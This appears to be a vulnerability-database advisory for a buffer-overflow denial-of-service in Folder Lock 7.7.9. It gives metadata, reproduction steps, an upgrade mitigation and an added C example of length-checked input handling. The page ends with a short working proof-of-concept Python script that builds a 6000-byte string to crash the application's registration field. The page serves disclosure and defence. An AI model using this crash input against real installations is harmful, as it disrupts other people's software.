Vendor: Folder Lock
By: Achilles
CVSS: 7.8 HIGH
Denial of Service
CWE: 119
Product Name: Folder Lock
Affected Version From: 7.7.9
Affected Version To: 7.7.9
Patch Exists: YES
Related CWE: N/A
CPE: a:newsoftwares.net:folder_lock:7.7.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64
2019

Folder Lock v7.7.9 Denial of Service Exploit

A buffer overflow vulnerability exists in Folder Lock v7.7.9 that allows an attacker to cause a denial-of-service condition by submitting a specially crafted serial number and registration key. To reproduce it, run the Python script to create a file containing a 6000-byte string, copy the file's contents to the clipboard, open Folder Lock, click 'Enter Key', paste the contents into the 'Serial Number and Registration Key' field, and click 'Submit'. The application then crashes.

Mitigation:

Upgrade to the latest version of Folder Lock.
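
For developers, the flaw class reported here (CWE-119) is closed by checking the length of the field's text before it is copied into a fixed-size buffer. The following is an added example, not Folder Lock's code and not part of the original advisory; the function names, the 64-character limit and the key alphabet are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define KEY_MAX 64 /* assumed upper bound for a serial/registration key */

enum key_status { KEY_OK, KEY_BAD_ARG, KEY_EMPTY, KEY_TOO_LONG, KEY_BAD_CHAR };

/* Validate untrusted text-field input, then copy it into a fixed buffer.
 * src need not be NUL-terminated; src_len is the length the UI reports.
 * The unsafe pattern this replaces is an unchecked copy such as
 * strcpy(dst, src) into a stack buffer (assumed, typical for CWE-119). */
enum key_status accept_key(const char *src, size_t src_len,
                           char *dst, size_t dst_size)
{
    if (src == NULL || dst == NULL || dst_size == 0)
        return KEY_BAD_ARG;
    dst[0] = '\0';                      /* dst is empty on every failure */
    if (src_len == 0)
        return KEY_EMPTY;
    /* Reject oversized input outright instead of truncating it. */
    if (src_len > KEY_MAX || src_len >= dst_size)
        return KEY_TOO_LONG;
    for (size_t i = 0; i < src_len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '-')    /* assumed key alphabet */
            return KEY_BAD_CHAR;
    }
    memcpy(dst, src, src_len);
    dst[src_len] = '\0';
    return KEY_OK;
}

/* Constructed input: 6000 'A' bytes, the size used on this page. */
enum key_status check_oversized(void)
{
    static char big[6000];
    char key[KEY_MAX + 1];
    memset(big, 'A', sizeof big);
    return accept_key(big, sizeof big, key, sizeof key);
}

int main(void)
{
    char key[KEY_MAX + 1];
    printf("6000 bytes -> %d\n", check_oversized());
    printf("sample key -> %d\n", accept_key("ABCD-1234-EFGH", 14, key, sizeof key));
    return 0;
}
```

Setting a maximum text length on the input control itself is a useful second layer, but the check in the handler is the one that must hold.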

Exploit-DB raw data:

# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage: https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64


# 1.- Run python code: Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.



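#!/usr/bin/env python3
# Builds the 6000-byte string of "A" characters used in the steps above.
buffer = "\x41" * 6000

try:
    # Write the string to Evil.txt in the current directory.
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except OSError:
    print("File cannot be created")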